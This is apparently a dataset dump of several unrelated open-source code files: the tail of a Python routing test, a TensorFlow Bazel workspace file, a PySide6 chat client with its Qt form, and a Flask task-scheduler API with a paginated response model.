req = Request.blank('/auth/v3.14')
req.method = "POST"
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
req = Request.blank('/v1')
req.method = "PUT"
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
req = Request.blank('/v1.0/')
req.method = "DELETE"
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "10088/tensorflow",
"score": 2
} |
#### File: tensorflow/tensorflow/workspace1.bzl
```python
load("//third_party/android:android_configure.bzl", "android_configure")
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
load("@com_github_grpc_grpc//bazel:grpc_deps.bzl", "grpc_deps")
load("@io_bazel_rules_closure//closure:defs.bzl", "closure_repositories")
load("@rules_cuda//cuda:dependencies.bzl", "rules_cuda_dependencies")
def workspace():
native.register_toolchains("@local_config_python//:py_toolchain")
rules_cuda_dependencies()
closure_repositories()
http_archive(
name = "bazel_toolchains",
sha256 = "540cc8fec2bf8ab64d16fb9a7018f25738a4a03434057ea01b5d34add446ffb1",
strip_prefix = "bazel-toolchains-ea243d43269df23de03a797cff2347e1fc3d02bb",
urls = [
"http://mirror.tensorflow.org/github.com/bazelbuild/bazel-toolchains/archive/ea243d43269df23de03a797cff2347e1fc3d02bb.tar.gz",
"https://github.com/bazelbuild/bazel-toolchains/archive/ea243d43269df23de03a797cff2347e1fc3d02bb.tar.gz",
],
)
android_configure(name = "local_config_android")
grpc_deps()
# Alias so it can be loaded without assigning to a different symbol to prevent
# shadowing previous loads and trigger a buildifier warning.
tf_workspace1 = workspace
``` |
{
"source": "100dlswjd/message_2",
"score": 2
} |
#### File: message_2/client/client_form.py
```python
from PySide6.QtCore import (QCoreApplication, QDate, QDateTime, QLocale,
QMetaObject, QObject, QPoint, QRect,
QSize, QTime, QUrl, Qt)
from PySide6.QtGui import (QAction, QBrush, QColor, QConicalGradient,
QCursor, QFont, QFontDatabase, QGradient,
QIcon, QImage, QKeySequence, QLinearGradient,
QPainter, QPalette, QPixmap, QRadialGradient,
QTransform)
from PySide6.QtWidgets import (QApplication, QHBoxLayout, QLabel, QLineEdit,
QListWidget, QListWidgetItem, QMainWindow, QMenu,
QMenuBar, QPushButton, QSizePolicy, QStatusBar,
QVBoxLayout, QWidget)
class Ui_mainWindow(object):
def setupUi(self, mainWindow):
if not mainWindow.objectName():
mainWindow.setObjectName(u"mainWindow")
mainWindow.resize(268, 527)
mainWindow.setInputMethodHints(Qt.ImhMultiLine)
self.actionserver_ip = QAction(mainWindow)
self.actionserver_ip.setObjectName(u"actionserver_ip")
self.action_name_set = QAction(mainWindow)
self.action_name_set.setObjectName(u"action_name_set")
self.centralwidget = QWidget(mainWindow)
self.centralwidget.setObjectName(u"centralwidget")
self.verticalLayout = QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName(u"verticalLayout")
self.label = QLabel(self.centralwidget)
self.label.setObjectName(u"label")
self.label.setAlignment(Qt.AlignCenter)
self.verticalLayout.addWidget(self.label)
self.horizontalLayout_2 = QHBoxLayout()
self.horizontalLayout_2.setObjectName(u"horizontalLayout_2")
self.lineEdit_ip_set = QLineEdit(self.centralwidget)
self.lineEdit_ip_set.setObjectName(u"lineEdit_ip_set")
self.horizontalLayout_2.addWidget(self.lineEdit_ip_set)
self.btn_ip_set = QPushButton(self.centralwidget)
self.btn_ip_set.setObjectName(u"btn_ip_set")
self.horizontalLayout_2.addWidget(self.btn_ip_set)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.listWidget = QListWidget(self.centralwidget)
self.listWidget.setObjectName(u"listWidget")
self.listWidget.setInputMethodHints(Qt.ImhMultiLine)
self.listWidget.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.verticalLayout.addWidget(self.listWidget)
self.horizontalLayout = QHBoxLayout()
self.horizontalLayout.setObjectName(u"horizontalLayout")
self.lineEdit_message = QLineEdit(self.centralwidget)
self.lineEdit_message.setObjectName(u"lineEdit_message")
self.horizontalLayout.addWidget(self.lineEdit_message)
self.btn_message = QPushButton(self.centralwidget)
self.btn_message.setObjectName(u"btn_message")
self.horizontalLayout.addWidget(self.btn_message)
self.verticalLayout.addLayout(self.horizontalLayout)
mainWindow.setCentralWidget(self.centralwidget)
self.menubar = QMenuBar(mainWindow)
self.menubar.setObjectName(u"menubar")
self.menubar.setGeometry(QRect(0, 0, 268, 22))
self.menu = QMenu(self.menubar)
self.menu.setObjectName(u"menu")
mainWindow.setMenuBar(self.menubar)
self.statusbar = QStatusBar(mainWindow)
self.statusbar.setObjectName(u"statusbar")
mainWindow.setStatusBar(self.statusbar)
self.menubar.addAction(self.menu.menuAction())
self.menu.addAction(self.action_name_set)
self.retranslateUi(mainWindow)
QMetaObject.connectSlotsByName(mainWindow)
# setupUi
def retranslateUi(self, mainWindow):
mainWindow.setWindowTitle(QCoreApplication.translate("mainWindow", u"ddatG-Client", None))
self.actionserver_ip.setText(QCoreApplication.translate("mainWindow", u"server - ip", None))
self.action_name_set.setText(QCoreApplication.translate("mainWindow", u"\ub2c9\ub124\uc784 \uc124\uc815", None))
self.label.setText(QCoreApplication.translate("mainWindow", u"\ud604\uc7ac \uc11c\ubc84 : ", None))
self.btn_ip_set.setText(QCoreApplication.translate("mainWindow", u"\uc811\uc18d", None))
self.btn_message.setText(QCoreApplication.translate("mainWindow", u"\uc804\uc1a1", None))
self.menu.setTitle(QCoreApplication.translate("mainWindow", u"\uc124\uc815", None))
# retranslateUi
```
#### File: message_2/client/main.py
```python
import sys
import win32gui
import socket
import time
from qt_material import apply_stylesheet
from PySide6.QtCore import Slot, QObject, Signal, QEvent
from PySide6.QtWidgets import QMainWindow, QApplication, QListWidgetItem, QDialog, QWidget
from PySide6.QtNetwork import QTcpSocket
from PySide6.QtGui import Qt, QKeyEvent, QCloseEvent
from client_form import Ui_mainWindow
from name_set import Ui_Form
def pressed(widget : QWidget):
class Filter(QObject):
pressed = Signal(QKeyEvent)
def eventFilter(self, watched: QObject, event: QEvent) -> bool:
if watched == widget and event.type() == QEvent.KeyPress:
self.pressed.emit(QKeyEvent(event))
return super().eventFilter(watched, event)
filter = Filter(widget)
widget.installEventFilter(filter)
return filter.pressed
class name_set(QDialog, Ui_Form):
def __init__(self):
super(name_set, self).__init__()
self.setupUi(self)
self.flag = False
self.btn_ok.clicked.connect(self.click_handler)
self.exec()
def result(self):
return self.flag, self.lineEdit.text()
@Slot()
def click_handler(self):
self.flag = True
self.close()
class Mainwindow(QMainWindow, Ui_mainWindow):
def __init__(self):
super(Mainwindow, self).__init__()
self.setupUi(self)
self.bind_flag = False
self._ip = ""
self.name = "알수없음"
self.client_ip = socket.gethostbyname(socket.gethostname())
self.action_name_set.triggered.connect(self.triggered_handler)
self._sock = QTcpSocket()
self._sock.readyRead.connect(self.readyRead_handler)
self._sock.connected.connect(self.connect_handler)
self._sock.errorOccurred.connect(self.error_handler)
self._sock.disconnected.connect(self.disconnect_handler)
self.btn_ip_set.clicked.connect(self.btn_ip_handler)
self.btn_message.clicked.connect(self.btn_message_handler)
pressed(self.lineEdit_message).connect(self.message_press_handler)
pressed(self.lineEdit_ip_set).connect(self.ip_set_press_handler)
@Slot(QKeyEvent)
def ip_set_press_handler(self, Key_Event : QKeyEvent):
if Key_Event.key() == Qt.Key_Return:
self.btn_ip_set.click()
@Slot(QKeyEvent)
def message_press_handler(self, Key_Event : QKeyEvent):
if Key_Event.key() == Qt.Key_Return:
self.btn_message.click()
@Slot()
def triggered_handler(self):
flag, name = name_set.result(name_set())
if flag:
befor_name = self.name
if len(name) > 10:
name = name[:10]
self.name = name
opcode = "@"
opcode += befor_name
opcode += "_"
opcode += self.name
self._sock.write(opcode.encode())
change_text = " 으로 변경\n"+ "↖" + self.client_ip + "↗"
self._sock.write(change_text.encode())
@Slot()
def disconnect_handler(self):
self.label.setText("연결이 해제되었습니다.")
self.btn_ip_set.click()
message = "연결이 해제되었습니다. !"
item = QListWidgetItem()
item.setText(message)
item.setTextAlignment(Qt.AlignCenter)
self.listWidget.addItem(item)
self.listWidget.scrollToBottom()
@Slot(QTcpSocket.SocketError)
def error_handler(self, error_code : QTcpSocket.SocketError):
if error_code:
message = "연결중입니다..."
item = QListWidgetItem()
item.setText(message)
item.setTextAlignment(Qt.AlignCenter)
self.listWidget.addItem(item)
self.listWidget.scrollToBottom()
@Slot()
def connect_handler(self):
message = "접속 되었습니다."
item = QListWidgetItem()
item.setText(message)
item.setTextAlignment(Qt.AlignCenter)
self.listWidget.addItem(item)
self.listWidget.scrollToBottom()
self.btn_ip_set.setText("연결 끊기")
self.bind_flag = True
self._sock.write(self.client_ip.encode())
@Slot()
def readyRead_handler(self):
if self._sock.bytesAvailable():
data = bytes(self._sock.readAll())
data = data.decode()
if data[-10:] == "@list_info":
text = self.name + " -> " + self.client_ip
self._sock.write(text.encode())
return 0
item = QListWidgetItem()
item.setText(data)
item.setTextAlignment(Qt.AlignLeft)
self.listWidget.addItem(item)
self.listWidget.scrollToBottom()
@Slot()
def btn_ip_handler(self):
if self.bind_flag == False:
ip_set = "현재 서버 : "
ip = self.lineEdit_ip_set.text()
ip_set += ip
self.label.setText(ip_set)
self._sock.connectToHost(ip, 9500)
self.lineEdit_ip_set.clear()
elif self.bind_flag == True:
self._sock.disconnectFromHost()
self.label.setText("연결이 해제되었습니다.")
self.btn_ip_set.setText("접속")
self.bind_flag = False
@Slot()
def btn_message_handler(self):
if len(self.lineEdit_message.text()) > 0:
message = f"!{self.name} : {self.lineEdit_message.text()}"
self._sock.write(message.encode())
item = QListWidgetItem()
item.setText(message[1:])
item.setTextAlignment(Qt.AlignRight)
self.listWidget.addItem(item)
self.listWidget.scrollToBottom()
self.lineEdit_message.clear()
if __name__ == "__main__":
winname = "ddatG-Client"
check = win32gui.FindWindow(None, winname)
if not check:
app = QApplication(sys.argv)
window = Mainwindow()
#app.setStyle('Fusion')
apply_stylesheet(app, theme = 'dark_blue.xml')
window.show()
app.exec()
``` |
{
"source": "100dlswjd/message",
"score": 2
} |
#### File: message/client/main_client.py
```python
import sys
import win32api
import win32con
import time
from PySide6.QtWidgets import QMainWindow, QApplication
from PySide6.QtNetwork import QTcpSocket
from PySide6.QtCore import Slot
from threading import Thread, Event
from Client_form import Ui_MainWindow
class Mainwindow(QMainWindow, Ui_MainWindow):
def __init__(self):
super(Mainwindow, self).__init__()
self.setupUi(self)
self._ip = "000.000.000.000"
self.pushButton.clicked.connect(self.button_handler)
self._sock = QTcpSocket()
self._sock.connectToHost(self._ip, 9500)
self._sock.readyRead.connect(self.readyRead_handler)
self._sock.errorOccurred.connect(self.error_handler)
self._sock.connected.connect(self.connected_handler)
"""self._exit_event = Event()
self._exit_event.clear()
self._key_check_thread = Thread(target = self.key_check_proc)
self._key_check_thread.start()"""
"""def key_check_proc(self):
while self._exit_event.is_set() == False:
if self.lineEdit.text():
if win32api.GetAsyncKeyState(win32con.VK_RETURN) & 0x8000:
self.button_handler()
time.sleep(0.1)"""
@Slot()
def connected_handler(self):
self.label_1.setText(self.label_2.text())
self.label_2.setText(self.label_3.text())
self.label_3.setText(self.label_4.text())
self.label_4.setText(self.label_5.text())
self.label_5.setText("연결 되었습니다 !")
@Slot(QTcpSocket.SocketError)
def error_handler(self, error_code : QTcpSocket.SocketError):
if error_code == QTcpSocket.SocketError.ConnectionRefusedError:
self.label_1.setText(self.label_2.text())
self.label_2.setText(self.label_3.text())
self.label_3.setText(self.label_4.text())
self.label_4.setText(self.label_5.text())
self.label_5.setText("연결 중입니다 . . ")
self._sock.connectToHost(self._ip, 9500)
@Slot()
def readyRead_handler(self):
if self._sock.bytesAvailable():
data = bytes(self._sock.readAll())
data = data.decode()
self.label_1.setText(self.label_2.text())
self.label_2.setText(self.label_3.text())
self.label_3.setText(self.label_4.text())
self.label_4.setText(self.label_5.text())
self.label_5.setText(str(data))
@Slot()
def button_handler(self):
text = self.lineEdit.text()
self.label_1.setText(self.label_2.text())
self.label_2.setText(self.label_3.text())
self.label_3.setText(self.label_4.text())
self.label_4.setText(self.label_5.text())
self.label_5.setText(f"내가 보냄 : {text}")
self._sock.write(f"클라이언트에서 보냄 : {text}".encode())
self.lineEdit.setText("")
time.sleep(0.1)
def closeEvent(self, event) -> None:
self._sock.disconnectFromHost()
self._exit_event.set()
return super().closeEvent(event)
if __name__ == "__main__":
app = QApplication(sys.argv)
window = Mainwindow()
window.show()
app.exec()
``` |
{
"source": "100-gram/task-scheduler",
"score": 2
} |
#### File: 100-gram/task-scheduler/app.py
```python
from flask import make_response, jsonify
from werkzeug.exceptions import HTTPException
from flask_restful import Api
from server.server import Server
from router.api import api
from router.task_list import TaskList
from router.task import Task
from config.config import disable_log, api_prefix
app = Server(__name__)
restful_api = Api(app)
restful_api.add_resource(TaskList, f'{api_prefix}/tasks')
restful_api.add_resource(Task, f'{api_prefix}/tasks/<int:task_id>')
app.register_blueprint(api, url_prefix=api_prefix)
@app.route('/')
def root_handler():
return f'Api could be found at <a href="{api_prefix}">{api_prefix}</a>'
@app.errorhandler(HTTPException)
def error_handler(error):
return make_response(jsonify({'error': error.description}), error.code)
if __name__ == '__main__':
disable_log(app)
app.run()
```
#### File: task-scheduler/model/response.py
```python
from model.task import Task
from config.config import test_suits_folder_path
"""
Wrapper for pagination Response
Provide all methods to manage Response
"""
class Response:
def __init__(self, tasks: [Task], offset: int, limit: int, query: str, count_all: int, status_filter=None):
"""
Constructor for Response object
:param tasks: list of Tasks
:param offset: count of skipping tasks
:param limit: count of Tasks in page
:param query: searched parameter
:param count_all: count of all Tasks
:param status_filter: searched Task status
"""
self.tasks = tasks
self.count_all = count_all
self.status_filter = status_filter
self.offset = offset if isinstance(offset, int) and offset >= 0 else 0
self.limit = limit if isinstance(limit, int) and limit > 0 else None
self.query = query if isinstance(query, str) and query.__len__() > 0 else None
def __json__(self):
"""
JSON serialization for DataManager object
:return: dict with all inner fields
>>> a = Response([], 5, 5, "something", 20, True)
>>> a.__json__().__str__() == open(test_suits_folder_path + "/test_response.txt", 'r').read()
True
"""
return {
'tasks': self.tasks,
'offset': self.offset,
'limit': self.limit,
'query': self.query,
'count_all': self.count_all,
'status_filter': self.status_filter
}
for_json = __json__ # supported by simplejson
``` |
Subsets and Splits